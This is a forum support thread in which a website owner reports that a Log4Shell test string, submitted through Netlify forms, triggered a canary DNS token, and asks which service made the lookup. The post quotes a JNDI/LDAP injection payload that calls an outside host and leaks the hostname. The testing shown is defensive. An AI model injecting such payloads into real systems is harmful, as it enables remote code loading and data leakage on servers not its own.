I have a custom form on my website and a webhook which triggers a lambda function. I used https://canarytokens.org/ to test/verify the log4shell vulnerability, and when the data is submitted via netlify forms and called on the lambda function, the token was activated.
Note: Our lambda function in netlify doesn’t post the data to any external system and it’s entirely in NodeJS.
I am not sure but as my lambda function is not using any external service and only netlify forms and netlify forms webhooks/notifications I am trying to understand where/which service is doing the query to the canary DNS.
I have submitted my forms and replaced fields like name and text with the JNDI string ${jndi:ldap://x${hostName}.L4J. INSERT-COPIED-STRING-HERE /a} and the token received a DNS query, meaning that someone did query that token. So I am wondering who/where the problem is.
I have contacted netlify and have the full report with the IP but didn’t receive an answer yet.
You can follow the conversation about log4j here. Our security team is investigating.
If you have questions about form functionality or believe there is an error, we can continue the conversation about your form. If not, please head over to the other thread.
Hello Hillary, due to the high risk of this issue, is it not possible for someone to advise and get in touch in this regard? I have all the logs, including the IP of the servers that triggered the DNS query against the ldap string from the canary token.